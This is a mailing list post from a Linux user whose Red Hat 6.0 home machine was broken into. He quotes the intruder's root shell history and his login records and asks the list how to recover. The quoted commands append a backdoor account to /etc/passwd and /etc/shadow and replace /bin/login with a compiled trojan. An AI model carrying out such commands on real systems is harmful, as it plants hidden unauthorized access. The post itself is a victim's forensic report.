[lug] security

[Sevinsky Joel]

Hello All,

Being new to Linux I received an education in security this weekend.  I
have a Pentium Pro system at home running Red Hat 6.0 (I installed
EVERYTHING during the installation) and I have DSL using DHCP through CU
as my ISP and USWEST for the service.  I discovered something in my root
history today that was strange (as in commands that I did not emter):

   23  uname -a; pwd;
   24  mkdir /dev/hda23
   25  cd /dev/hda23
   26  ftp dshllone.net
   27  ftp shellone.net

For these commands I cannot find anything in the last file that is
unusual.  No logins from unknown computers.  It actually correesponds to a
period of time when the system was running for only a few minutes and
everything around it looks fine also.  Not so for the following.

   46  uname -a; pwd;
   47  cd /tmp
   48  passwd gdm
   49  passwd gdm
   50  echo "snow1:X:200:200:::/bin/sh" >> /etc/passwd
   51  echo "snow1:NOU4mAe45g67k:10776:0:99999:7:::" >> /etc/shadow
   52  cd /tmp
   53  gcc bj.c -o bj
   54  cp /bin/login /bin/xcat
   55  cp bj /bin/login
   56  cd /tmp
   57  cp bj /bin/login
   58  who;

These commands were from a time when my system was up for a few days with
the same IP address and I do very little as root (usually just shutdown).
The logins that correspond to this period of time are:

root     tty1         Sun Nov 21 21:33 - down   (00:00)
snow1    pts/1        Sun Nov 21 13:35 - 13:47  (00:12)
ts003d40.tac-wa.concentric.net        
sevinsky pts/0        Sun Nov 21 07:46 - 21:32  (13:45)     :0
sevinsky pts/0        Fri Nov 19 08:09 - 15:04 (1+06:54)    :0
sevinsky pts/0        Thu Nov 18 18:31 - 18:32  (00:01)     :0
sevinsky pts/0        Thu Nov 18 17:41 - 17:50  (00:09)     :0
sevinsky tty1         Thu Nov 18 17:37 - 21:32 (3+03:55)
sevinsky pts/0        Thu Nov 18 17:03 - 17:05  (00:02)
1Cust68.tnt14.denver.co.da.uu.net
sevinsky pts/0        Thu Nov 18 17:02 - 17:02  (00:00)
1Cust68.tnt14.denver.co.da.uu.net
sevinsky pts/0        Thu Nov 18 13:56 - 13:57  (00:00)
chem203.Colorado.EDU
sevinsky pts/0        Thu Nov 18 09:18 - 10:20  (01:01)     :0
sevinsky pts/0        Wed Nov 17 23:16 - 23:23  (00:06)     :0
sevinsky tty1         Wed Nov 17 22:59 - 10:20  (11:21)
root     tty1         Wed Nov 17 22:56 - 22:59  (00:02)
reboot   system boot  Wed Nov 17 22:55                                       

The only accounts I have set up on this machine are sevinsky(me) and
amy(my wife). I am assuming that the first break was from 
1Cust68.tnt14.denver.co.da.uu.net and somehow knew my login and password
and set up the snow1 account.  Then they later came back as snow1 from
concentric.net and compiled and installed bj.c.  I am guessing that after
I rebooted my machine and got a different IP address they were not able to
find my system again.  Well that being said, what should be done from
here?  Should I just reinstall everything?  That would not be difficult at
all.  Any suggestions on some good reading to learn about security?  I
have the Running Linux book and I am about 200 pages into it but if I want
to keep my system running I better do some quick reading on security.
Thanks for your help.

Joel Sevinsky

*******************************************
Joel Sevinsky
Department of MCD Biology
Campus Box 347
University of Colorado
Boulder, CO  80303

(303)492-7794     FAX: (303)492-2439
joel at sevinsky.com
http://www.sevinsky.com
******************************************